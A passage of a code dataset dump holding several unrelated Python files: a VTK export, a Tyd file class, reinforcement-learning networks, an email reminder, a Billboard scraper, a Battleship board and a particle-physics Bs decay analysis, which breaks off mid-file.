2.0)\n\nfilename = 'mandel_grid'\n\ngridToVTK(filename, x, y, z, pointData = {'N': N.reshape((nx, ny, 1), order = 'C')})\n\nprint('%s.vtr generated' % 
(filename))\n","repo_name":"dubrayn/dubrayn.github.io","sub_path":"examples/vtk/pyevtk_grid.py","file_name":"pyevtk_grid.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"69884265747","text":"with open('text.txt', 'r') as cats:\n \n dict_cat = []\n list_cats = cats.readlines()\n for i in list_cats:\n \n keys = ['id', 'name', 'age']\n i = tuple(i.strip().split(','))\n dictionary = dict(zip(keys, i))\n dict_cat.append(dictionary)\n \n print(dict_cat)\n\n\n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n # for i in cats:\n # list_cats += i.split('\\n')\n # new_list_cats = list_cats[::2]\n # print(new_list_cats)\n #result = [{'id': d[0], 'name': d[1], 'number': d[2]} for d in data]\n\n \n","repo_name":"Ihor-Usenko/go_it","sub_path":"06working_with_files/auto_05.py","file_name":"auto_05.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2691776561","text":"from __future__ import annotations\nfrom os.path import basename, splitext\nfrom typing import Optional\n\nfrom .nodes import TydDocument\nfrom .tyd_from_text import parse\nfrom .tyd_to_text import dump\n\n\ndef from_document(doc: TydDocument, file_path: Optional[str] = None) -> TydFile:\n \"\"\"Returns TydFile object created from a TydDocument object.\n\n Parameters\n ----------\n doc : TydDocument\n A TydDocument object to use to create TydFile.\n file_path : Optional[str]\n A string representing file path, by default None.\n\n Returns\n -------\n TydFile\n A TydFile created.\n \"\"\"\n tyd_file = TydFile(doc, file_path)\n return tyd_file\n\n\ndef from_file(file_path: str) -> TydFile:\n \"\"\"Returns TydFile object created from a file of path passed.\n\n Parameters\n ----------\n file_path : str\n A string representing filepath.\n\n Returns\n -------\n TydFile\n A TydFile created.\n \"\"\"\n try:\n with open(file_path, mode=\"r\", encoding=\"utf-8\") as f:\n read_contents = f.read()\n\n tyd_node_list = list(parse(read_contents))\n tyd_doc = TydDocument(tyd_node_list)\n return from_document(tyd_doc, file_path)\n except Exception as e:\n raise Exception(f\"Exception loading {file_path}: {e}\")\n\n\nclass TydFile:\n \"\"\"This represents tyd file objects.\n\n **Don't instance!**\n The class is not intended to be created by users.\n You can get instances of the class only via class methods.\n \"\"\"\n\n def __init__(self, doc: TydDocument, file_path: Optional[str] = None):\n self._doc: TydDocument = doc\n self._file_path: Optional[str] = file_path\n\n @property\n def document(self) -> TydDocument:\n return self._doc\n\n @document.setter\n def document(self, value: TydDocument) -> None:\n self._doc = value\n\n @property\n def file_path(self) -> Optional[str]:\n return self._file_path\n\n @property\n def file_name(self) -> str:\n return splitext(basename(self._file_path))[0]\n\n def save(self, file_path: Optional[str]=None):\n if file_path is not None:\n self._file_path = file_path\n elif file_path is None:\n raise AttributeError(\n \"When didn't set filepath to TydFile, filepath parameter mustn't be None.\"\n )\n\n builder = []\n\n for node in self._doc:\n builder.append(dump(node) + \"\\n\")\n\n with open(file_path, mode=\"w\", encoding=\"utf-8\") as f:\n 
f.write(\"\".join(builder))\n","repo_name":"Lazialize/tyd-python","sub_path":"tyd/tyd_file.py","file_name":"tyd_file.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"6240655903","text":"\nimport tensorflow as tf\nfrom tensorflow import keras\nimport tensorflow_probability as tfp\n\nclass CreateActorNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateActorNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.mean = tf.keras.layers.Dense(n_actions, activation=None)\n self.stddev = tf.keras.layers.Dense(n_actions, activation=\"sigmoid\")\n\n def call(self, state):\n probs = self.fc1(state)\n probs = self.fc2(probs)\n mean = self.mean(probs)\n stddev = self.mean(probs)\n return mean, stddev\n\n def sample_action(self, state):\n mean, stddev = self.call(state)\n dist = tfp.distributions.Normal(mean, stddev)\n action = dist.sample()\n return action, dist.log_prob(action)\n\n\n\nclass CreateCriticNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateCriticNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.v = tf.keras.layers.Dense(1, activation=None)\n\n def call(self, state, action):\n state_values = self.fc1(tf.concat([state, action], 1))\n state_values = self.fc2(state_values)\n value = self.v(state_values)\n return value\n\n\nclass CreateValueNetwork(keras.Model):\n def __init__(self, n_actions, fc1_dims=256, fc2_dims=256):\n super(CreateValueNetwork, self).__init__()\n self.n_actions = n_actions\n self.fc1_dims = fc1_dims\n self.fc2_dims = fc2_dims\n\n self.fc1 = tf.keras.layers.Dense(fc1_dims, activation=\"relu\")\n self.fc2 = tf.keras.layers.Dense(fc2_dims, activation=\"relu\")\n self.v = tf.keras.layers.Dense(1, activation=None)\n\n def call(self, state):\n state_values = self.fc1(state)\n state_values = self.fc2(state_values)\n value = self.v(state_values)\n return value\n\n\n\n\n\n\n\n","repo_name":"oeg1n18/RL_Library","sub_path":"Networks/SACNet.py","file_name":"SACNet.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33923061311","text":"import smtplib\nfrom email.mime.text import MIMEText\nimport pandas as pd\nfrom datetime import datetime, timedelta\nimport logging\nfrom dotenv import load_dotenv\nimport os\n\nload_dotenv()\n\n# list for recipients\nemailRecipients = []\nerrorRecipient = []\n\n# enviroment variables setup\nxPath = os.getenv(\"XLSXPATH\")\nlogPath = os.getenv(\"LOGFILEPATH\")\nenvRecipients = os.getenv(\"EMAILRECIPIENTS\")\nerrorRecipient.append(os.getenv(\"ERRORRECIPIENT\"))\nerrorRecipientSTR = os.getenv(\"ERRORRECIPIENT\")\nenvSender = os.getenv(\"SENDER\")\nenvSmtpPass = os.getenv(\"SMTP_PASS\")\n\n# env list\nfor email in envRecipients.split(\",\"):\n emailRecipients.append(email)\n\nlogging.basicConfig(filename=logPath, level=logging.INFO)\n\ndef main():\n try:\n with open(xPath, \"rb\") as f:\n df = pd.read_excel(f, skiprows=3, engine='openpyxl')\n except Exception as err:\n 
errorMail(err)\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Hiba a file megnyitásakor: \" + f\"{err}\")\n exit(1)\n\n dateCompare = datetime.today() + timedelta(days=40)\n\n for index, row in df.iterrows():\n if row['Dátum'] < dateCompare:\n datum = row['Dátum'].strftime(\"%Y.%m.%d\")\n okmany = row['Okmány']\n subject = f'{okmany} Lejáró okmány {datum}'\n body = f'Emlékeztető email lejáró okmányról.\\n {datum} {okmany}'\n recipients = emailRecipients\n try:\n send_email(subject, body, recipients)\n except smtplib.SMTPException as e:\n errorMail(e)\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Nem sikerült elküldeni a levelet hiba: \" + f\"{e}\")\n exit(1)\n\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" sikeres küldés\")\n\ndef errorMail(err):\n subject = 'Ertesito email hiba'\n body = f\"Hiba - ellenőrizd a logot: \\n {err}\"\n recipients = errorRecipientSTR\n\n try:\n send_email(subject, body, recipients)\n except smtplib.SMTPException as e:\n logging.info(\" \" + datetime.now().strftime('%Y.%m.%d %H:%M:%S') + \" Nem sikerült elküldeni a levelet hiba: \" + f\"{e}\")\n\n\ndef send_email(subject, body, recipients):\n msg = MIMEText(body.encode('utf-8'), \"plain\", \"utf-8\")\n msg['Subject'] = subject\n msg['From'] = envSender\n msg['To'] = ', '.join(recipients)\n\n with smtplib.SMTP_SSL('smtp.gmail.com', 465) as server:\n server.login('f.ferenc@lazarteam.hu', envSmtpPass)\n server.sendmail(envSender, recipients, msg.as_string())\n print(\"Üzenet elküldve!\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"sontii/lazar-reminder","sub_path":"sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10714459547","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nimport re\nfrom sys import argv\n\nif len(argv) < 4:\n\tprint(\"python billboard_fetch.py .sng \")\n\texit()\n\n# fancy log printing stuff\nclass bcolors:\n\tHEADER = '\\033[95m'\n\tOKBLUE = '\\033[94m'\n\tOKGREEN = '\\033[92m'\n\tWARNING = '\\033[93m'\n\tFAIL = '\\033[91m'\n\tENDC = '\\033[0m'\n\tBOLD = '\\033[1m'\n\tUNDERLINE = '\\033[4m'\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading options for browser...\")\noptions = Options()\noptions.add_argument(\"--headless\")\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Loaded options for browser.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading browser driver...\")\ndriver = webdriver.Firefox(firefox_options=options)\ndriver.set_page_load_timeout(10)\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Loaded broswer driver.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Loading website {}...\".format(\"https://www.billboard.com/charts/\" + argv[1]))\ntry:\n\tdriver.get(\"https://www.billboard.com/charts/\" + argv[1])\nexcept:\n\tdriver.execute_script(\"window.stop();\")\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Website loaded.\")\n\nsrc = driver.page_source\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Page source code copied.\")\n\nprint(bcolors.OKGREEN + \"[INFO\\t]\" + bcolors.ENDC + \" Closing driver...\")\ndriver.close()\nprint(bcolors.OKGREEN + \"[OK\\t]\" + bcolors.ENDC + \" Driver closed.\")\n\nlines = src.split(\"\\n\")\n\nsng_text = [\"\\n\"]\n\nsng_text.append(\"--{}\".format(argv[3]))\n\nfor i in 
range(len(lines)):\n\tif lines[i] == '
':\n\t\tblock = [lines[x] for x in range(i, i + 12)]\n\t\tsong = \" ~ \".join([line for line in block if line[0] != \"<\" and line[1] != \"<\"])\n\t\tif song[0] == \" \":\n\t\t\tsong = song[1:]\n\t\tsong = song.replace(\"&amp;\", \"&\")\n\t\tsng_text.append(song)\n\telif '
' in lines[i]:\n\t\tsong = lines[i][37:len(lines[i]) - 6] + \" ~ \"\n\t\tj = i + 1\n\t\twhile any([x == \"<\" for x in lines[j][:2]]):\n\t\t\tj += 1\n\t\tsong += lines[j]\n\t\tif song[0] == \" \":\n\t\t\tsong = song[1:]\n\t\tsong = song.replace(\"&\", \"&\")\n\t\tsng_text.append(song)\n\nsng_text.append(\"--end\")\n\nwith open(argv[2], \"a+\") as sng:\n\tsng.write(\"\\n\".join(sng_text))","repo_name":"roshanmaind/Friday","sub_path":"dev_tools/sam/billboard_fetch.py","file_name":"billboard_fetch.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"22662643219","text":"import pygame\r\nimport random\r\npygame.init()\r\nfrom imgs import Screen\r\nfrom Write import Display_message\r\nfrom Colors import white\r\nfrom Colors import red\r\nfrom Colors import green\r\nfrom Colors import blue\r\n\r\n\r\n\r\n###############################BOARD##################################\r\n\r\nclass Board:\r\n def __init__(self):\r\n self.grid =[[1]*8 for _ in range(8)] \r\n def setship(self,x,y,o):\r\n if(o==1):\r\n self.grid[x][y]=0\r\n self.grid[x+1][y]=0\r\n elif(o==0):\r\n self.grid[x][y]=0\r\n self.grid[x][y+1]=0\r\n def setsubmarine(self,x,y,o):\r\n if(y>4 and x>4):\r\n o=-1\r\n if(y>4 and x<4):\r\n o=1\r\n if(o==-1):\r\n self.grid[x][y]=4\r\n self.grid[x-1][y]=4\r\n self.grid[x-2][y]=4\r\n self.grid[x-3][y]=4\r\n if(o==1):\r\n self.grid[x][y]=4\r\n self.grid[x+1][y]=4\r\n self.grid[x+2][y]=4\r\n self.grid[x+3][y]=4\r\n elif(o==0):\r\n self.grid[x][y]=4\r\n self.grid[x][y+1]=4\r\n self.grid[x][y+2]=4\r\n self.grid[x][y+3]=4\r\n def printboard(self,com=False):\r\n print()\r\n num=-1\r\n nm=-1\r\n for i in range(9):\r\n for j in range(9):\r\n if(i==0 or j==0):\r\n z=\"0\"\r\n if(i==0):\r\n num=str(num)\r\n z=num\r\n num=int(num)\r\n num=num+1\r\n if(j==0):\r\n nm=str(nm)\r\n z=nm\r\n nm=int(nm)\r\n nm=nm+1 \r\n if(z!='-1'):\r\n pygame.draw.rect(Screen, white,((30*i)+20,(30*j)+20,28,28),1)\r\n Display_message(z, (30*i)+32, (30*j)+37, 20, 'Calibri')\r\n pygame.draw.rect(Screen, white,((30*i)+570,(30*j)+370,28,28),1)\r\n Display_message(z, (30*i)+582, (30*j)+387, 20, 'Calibri')\r\n pygame.display.update()\r\n for i in range(len(self.grid)):\r\n for j in range(len(self.grid[i])):\r\n if(com==False):\r\n if(self.grid[i][j]==1):\r\n '''print(\"*\",end=\" \")'''\r\n pygame.draw.rect(Screen, white,((30*i)+50,(30*j)+50,28,28,),1)\r\n pygame.display.update()\r\n elif(self.grid[i][j]==2):\r\n pygame.draw.rect(Screen, red,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n '''print(\"S\",end=\" \")'''\r\n pygame.draw.rect(Screen,green,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==3):\r\n pygame.draw.rect(Screen,blue,((30*i)+50,(30*j)+50,28,28))\r\n pygame.display.update()\r\n elif(com==True):\r\n if(self.grid[i][j]==1):\r\n '''print(\"*\",end=\" \")'''\r\n pygame.draw.rect(Screen, white,((30*i)+600,(30*j)+400,28,28),1)\r\n pygame.display.update()\r\n elif(self.grid[i][j]==2):\r\n pygame.draw.rect(Screen, red,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n '''print(\"S\",end=\" \")'''\r\n pygame.draw.rect(Screen, green,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n elif(self.grid[i][j]==3):\r\n pygame.draw.rect(Screen, blue,((30*i)+600,(30*j)+400,28,28))\r\n pygame.display.update()\r\n print()\r\n \r\n def attack(self,x,y,com=False):\r\n 
count_ships=0\r\n if(self.grid[x][y]==3 and com ==True):\r\n x=random.choice([1,2,3,4,5,6,7,0])\r\n y=random.choice([1,2,3,4,5,6,7,0])\r\n if(self.grid[x][y]==0 or self.grid[x][y]==4):\r\n self.grid[x][y]=2\r\n elif(self.grid[x][y]==1):\r\n self.grid[x][y]=3\r\n for i in range(len(self.grid)):\r\n for j in range(len(self.grid[i])):\r\n if(self.grid[i][j]==0 or self.grid[i][j]==4):\r\n count_ships=count_ships+1\r\n if(count_ships==0 and com==True):\r\n Display_message(\"Player WON !\", 526, 100, 50, 'Serif')\r\n if(count_ships==0 and com==False):\r\n Display_message(\"Player LOST !\", 526, 100, 50, 'Serif')\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ","repo_name":"SyedAR-17/Battle-Ship","sub_path":"Game_Board.py","file_name":"Game_Board.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72240118866","text":"#Exercise 7\r\n\r\nimport string\r\n\r\nall_char = string.printable\r\nall_num = string.digits\r\nall_special_char = string.punctuation\r\n\r\nall_things = [all_char, all_num, all_special_char]\r\n\r\nfile = open(\"jumble.txt\",\"r\")\r\n\r\nspace, tab, returns = 0,0,0\r\n\r\nfor line in file:\r\n for char in line:\r\n if char == \"\\n\":\r\n returns += 1\r\n elif char not in all_things and not char.isspace():\r\n tab += 1\r\n elif char == \" \":\r\n space += 1\r\n \r\n \r\nprint(\"No. spaces:\",space)\r\nprint(\"No. tabs:\", tab)\r\nprint(\"No. returns:\",returns)","repo_name":"baselhusam/The-Practice-of-Computing-Using-Python-Solved","sub_path":"Chapter 6/Problem 7/Problem 7.py","file_name":"Problem 7.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26866655856","text":"import sys\nimport ROOT\n\nprint (\"Load cxx analyzers ... 
\",)\nROOT.gSystem.Load(\"libedm4hep\")\nROOT.gSystem.Load(\"libpodio\")\nROOT.gSystem.Load(\"libFCCAnalyses\")\nROOT.gSystem.Load(\"libFCCAnalysesFlavour\")\n\nROOT.gErrorIgnoreLevel = ROOT.kFatal\n_edm = ROOT.edm4hep.ReconstructedParticleData()\n_pod = ROOT.podio.ObjectID()\n_fcc = ROOT.dummyLoader\n_bs = ROOT.dummyLoaderFlavour\n\n\n\n\nprint ('edm4hep ',_edm)\nprint ('podio ',_pod)\nprint ('fccana ',_fcc)\n\n#\n#\tThis is used to process a file in which the Bs and the Bsbar are forced\n#\tto decay into Jpsi ( -> mu mu) + Phi ( -> K K )\n#\tWe reconstruct the secondary vertex from the 2 muon and 2 kaon tracks.\n# The example also shows how to retrieve the MC and reco'ed Bs legs,\n# as well as the MC Bs, JP]psi and Phis, with their kinematics.\n#\n# Example file: \n# /eos/experiment/fcc/ee/examples/lowerTriangle/p8_ecm91GeV_Zbb_EvtGen_Bs2JpsiPhi_IDEAtrkCov.root\n# \tNote: these events were generated at (0,0,0), i.e.no smearing of the\n#\tprimary vertex.\n#\n\nclass analysis():\n\n #__________________________________________________________\n def __init__(self, inputlist, outname, ncpu):\n self.outname = outname\n if \".root\" not in outname:\n self.outname+=\".root\"\n\n #ROOT.ROOT.EnableImplicitMT(ncpu)\n\n self.df = ROOT.RDataFrame(\"events\", inputlist)\n print (\" done\")\n #__________________________________________________________\n def run(self):\n #df2 = (self.df.Range(1000)\t# to test over 1000 events only\n df2 = (self.df\n\n .Alias(\"Particle1\", \"Particle#1.index\")\n .Alias(\"MCRecoAssociations0\", \"MCRecoAssociations#0.index\")\n .Alias(\"MCRecoAssociations1\", \"MCRecoAssociations#1.index\")\n\n\n # MC event primary vertex\n .Define(\"MC_PrimaryVertex\", \"MCParticle::get_EventPrimaryVertex(21)( Particle )\" )\n\n # number of tracks in the event\n .Define(\"ntracks\",\"ReconstructedParticle2Track::getTK_n(EFlowTrack_1)\")\n\n # Retrieve the decay vertex of all MC particles\n #.Define(\"MC_DecayVertices\", \"MCParticle::get_endPoint( Particle, Particle1)\" )\n\n\n # MC indices of the decay Bs (PDG = 531) -> mu+ (PDG = -13) mu- (PDG = 13) K+ (PDG = 321) K- (PDG = -321)\n # Retrieves a vector of int's which correspond to indices in the Particle block\n # vector[0] = the mother, and then the daughters in the order specified, i.e. here\n # [1] = the mu+, [2] = the mu-, [3] = the K+, [4] = the K-\n # The first boolean below: when set to true, the dsughters specified in the list are looked\n # for among the final, stable particles that come out from the mother, i.e. 
the decay tree is\n\t # explored recursively if needed.\n # The second boolean: when set to true, the charge conjugate decays are included too.\n # If the event contains more than one such decays,only the first one is kept.\n\t # get_indices_ExclusiveDecay looks for an exclusive decay: if a mother is found, that decays \n # into the particles specified in the list plus other particle(s), this decay is not selected.\n .Define(\"Bs2MuMuKK_indices\", \"MCParticle::get_indices_ExclusiveDecay( 531, {-13,13,321,-321}, true, true) ( Particle, Particle1)\" )\n\n # the MC Bs : the Bs is the first particle in the Bs2MuMuKK_indices vector\n .Define(\"Bs\", \"selMC_leg(0) ( Bs2MuMuKK_indices, Particle )\")\n\n # and the MC legs of the Bs : the mu+ is the second particle in the vector, etc.\n .Define(\"Muplus\", \" selMC_leg(1)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Muminus\", \" selMC_leg(2)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Kplus\", \" selMC_leg(3)( Bs2MuMuKK_indices, Particle )\")\n .Define(\"Kminus\", \" selMC_leg(4)( Bs2MuMuKK_indices, Particle )\")\n\n # Kinematics of the Bs legs (MC) :\n .Define(\"Muplus_theta\", \"MCParticle::get_theta( Muplus )\")\n .Define(\"Muplus_phi\", \"MCParticle::get_phi( Muplus )\")\n .Define(\"Muplus_e\", \"MCParticle::get_e( Muplus )\")\n .Define(\"Muminus_theta\", \"MCParticle::get_theta( Muminus )\")\n .Define(\"Muminus_phi\", \"MCParticle::get_phi( Muminus )\")\n .Define(\"Muminus_e\", \"MCParticle::get_e( Muminus )\")\n .Define(\"Kplus_theta\", \"MCParticle::get_theta( Kplus )\")\n .Define(\"Kplus_phi\", \"MCParticle::get_phi( Kplus )\")\n .Define(\"Kplus_e\", \"MCParticle::get_e( Kplus )\")\n .Define(\"Kminus_theta\", \"MCParticle::get_theta( Kminus )\")\n .Define(\"Kminus_phi\", \"MCParticle::get_phi( Kminus )\")\n .Define(\"Kminus_e\", \"MCParticle::get_e( Kminus )\")\n\n\t # Kinematics of the mother Bs (MC)\n .Define(\"Bs_theta\", \"MCParticle::get_theta( Bs )\")\n .Define(\"Bs_phi\", \"MCParticle::get_phi( Bs )\")\n .Define(\"Bs_e\", \"MCParticle::get_e( Bs )\")\n\n \n # Decay vertex of the Bs (MC)\n # Careful with getMC_decayVertex: if Bs -> Bsbar, this returns the prod vertex of the Bsbar !\n #.Define(\"BsDecayVertex\", \"getMC_decayVertex(531, false)( Particle, Particle1)\")\n # Hence, use instead a custom method in Bs2JPsiPhi :\n .Define(\"BsMCDecayVertex\", \"BsMCDecayVertex( Bs2MuMuKK_indices, Particle )\")\n\n # Returns the RecoParticles associated with the four Bs decay products.\n # The size of this collection is always 4 provided that Bs2MuMuKK_indices is not empty,\n # possibly including \"dummy\" particles in case one of the legs did not make a RecoParticle.\n # This is done on purpose, in order to maintain the mapping with the indices - i.e. the 1st particle in \n # the list BsRecoParticles is the mu+, then the mu-, etc.\n # (selRP_matched_to_list ignores the unstable MC particles that are in the input list of indices\n \t # hence the mother particle, which is the [0] element of the Bs2MuMuKK_indices vector).\n .Define(\"BsRecoParticles\", \"ReconstructedParticle2MC::selRP_matched_to_list( Bs2MuMuKK_indices, MCRecoAssociations0,MCRecoAssociations1,ReconstructedParticles,Particle)\")\n\n # the corresponding tracks - here, dummy particles, if any, are removed, i.e. one may have < 4 tracks,\n # e.g. 
if one muon or kaon was emitted outside of the acceptance\n .Define(\"BsTracks\", \"ReconstructedParticle2Track::getRP2TRK( BsRecoParticles, EFlowTrack_1)\" )\n\n # number of tracks in this BsTracks collection ( = the #tracks used to reconstruct the Bs vertex)\n .Define(\"n_BsTracks\", \"ReconstructedParticle2Track::getTK_n( BsTracks )\")\n\n # Now we reconstruct the Bs decay vertex using the reco'ed tracks.\n # First the full object, of type Vertexing::FCCAnalysesVertex\n .Define(\"BsVertexObject\", \"VertexFitterSimple::VertexFitter_Tk( 2, BsTracks)\" )\n # from which we extract the edm4hep::VertexData object, which contains the vertex positiob in mm\n .Define(\"BsVertex\", \"VertexingUtils::get_VertexData( BsVertexObject )\")\n\n\n\t # We may want to look at the reco'ed Bs legs: in the BsRecoParticles vector, \n # the first particle (vector[0]) is the mu+, etc :\n .Define(\"RecoMuplus\", \"selRP_leg(0)( BsRecoParticles )\")\n .Define(\"RecoMuminus\", \"selRP_leg(1)( BsRecoParticles )\")\n .Define(\"RecoKplus\", \"selRP_leg(2)( BsRecoParticles )\")\n .Define(\"RecoKminus\", \"selRP_leg(3)( BsRecoParticles )\")\n # and their kinematics :\n .Define(\"RecoMuplus_theta\", \"ReconstructedParticle::get_theta( RecoMuplus )\")\n .Define(\"RecoMuplus_phi\", \"ReconstructedParticle::get_phi( RecoMuplus )\")\n .Define(\"RecoMuplus_e\", \"ReconstructedParticle::get_e( RecoMuplus )\")\n .Define(\"RecoMuminus_theta\", \"ReconstructedParticle::get_theta( RecoMuminus )\")\n .Define(\"RecoMuminus_phi\", \"ReconstructedParticle::get_phi( RecoMuminus )\")\n .Define(\"RecoMuminus_e\", \"ReconstructedParticle::get_e( RecoMuminus )\")\n .Define(\"RecoKplus_theta\", \"ReconstructedParticle::get_theta( RecoKplus )\")\n .Define(\"RecoKplus_phi\", \"ReconstructedParticle::get_phi( RecoKplus )\")\n .Define(\"RecoKplus_e\", \"ReconstructedParticle::get_e( RecoKplus )\")\n .Define(\"RecoKminus_theta\", \"ReconstructedParticle::get_theta( RecoKminus )\")\n .Define(\"RecoKminus_phi\", \"ReconstructedParticle::get_phi( RecoKminus )\")\n .Define(\"RecoKminus_e\", \"ReconstructedParticle::get_e( RecoKminus )\")\n\n\t # Looks at the angular separation (3D angles) between the Bs daughters: among\n # all the pairs of particles in BsRecoParticles, retrieve the minimal angular distance,\n # the maximal distance, and the average distance\n .Define(\"deltaAlpha_max\",\"ReconstructedParticle::angular_separationBuilder(0)( BsRecoParticles )\")\n .Define(\"deltaAlpha_min\",\"ReconstructedParticle::angular_separationBuilder(1)( BsRecoParticles )\")\n .Define(\"deltaAlpha_ave\",\"ReconstructedParticle::angular_separationBuilder(2)( BsRecoParticles )\")\n\n\t # To look at the angular separation between the MC Jpsi and the Phi :\n\n\t # First retrieve the indices of the JPsi and the phi :\n # MC indices of the decay Bs (PDG = 531) -> JPsi (PDG = 443) Phi (PDG = 333)\n # Retrieves a vector of int's which correspond to indices in the Particle block\n # vector[0] = the mother, and then the daughters in the order specified, i.e. here\n # [1] = the Jpsi, [2] = the phi\n # The first boolean below (here set to false) means that we look for a JPsi and a Phi\n # among the direct daughters of the mother, i.e. 
the decay tree is not explored down\n # to the final, stable particles.\n # The second boolean (true) means that the charge conjugate decay isincluded too.\n # If the event contains more than one such decays,only the first one is kept.\n # get_indices_ExclusiveDecay looks for an exclusive decay: if a mother is found, that decays \n # into the particles specified in the list plus other particle(s), this decay is not selected.\n .Define(\"Bs2JPsiPhi_indices\", \"MCParticle::get_indices_ExclusiveDecay( 531, {443,333}, false, true) ( Particle, Particle1)\" )\n\n # This extracts the MC Jpsi. In list of indices determined above, Bs2JPsiPhi_indices,\n # 1 is the position of the Jpsi in the Bs2JPsiPhi_indices vector.\n .Define(\"JPsi\", \"selMC_leg( 1) ( Bs2JPsiPhi_indices , Particle )\")\n # Idem: extract the MC Phi. 2 is the position of the Phi in the Bs2JPsiPhi_indices vector.\n .Define(\"Phi\", \"selMC_leg( 2) ( Bs2JPsiPhi_indices , Particle )\")\n\n # From these two MC particles, determine their angular separation\n .Define(\"Angle_JpsiPhi\", \"MCParticle::AngleBetweenTwoMCParticles( JPsi, Phi)\" )\n\n\n\n # the reco'ed legs, with the momenta at the Bs decay vertex - instead of at their\n\t # point of dca\n .Define(\"RecoMuplus_atVertex\", \"selRP_leg_atVertex(0) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoMuplus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoMuplus_atVertex )\")\n .Define(\"RecoMuplus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoMuplus_atVertex )\")\n .Define(\"RecoMuminus_atVertex\", \"selRP_leg_atVertex(1) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoMuminus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoMuminus_atVertex )\")\n .Define(\"RecoMuminus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoMuminus_atVertex )\")\n .Define(\"RecoKplus_atVertex\", \"selRP_leg_atVertex(2) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoKplus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoKplus_atVertex )\")\n .Define(\"RecoKplus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoKplus_atVertex )\")\n .Define(\"RecoKminus_atVertex\", \"selRP_leg_atVertex(3) ( BsRecoParticles, BsVertexObject, EFlowTrack_1 )\")\n .Define(\"RecoKminus_atVertex_theta\", \"ReconstructedParticle::get_theta( RecoKminus_atVertex )\")\n .Define(\"RecoKminus_atVertex_phi\", \"ReconstructedParticle::get_phi( RecoKminus_atVertex )\")\n\n # not so useful here, but for completeness : Bs to JPsi decay ?\n # Returns booleans. e.g. 
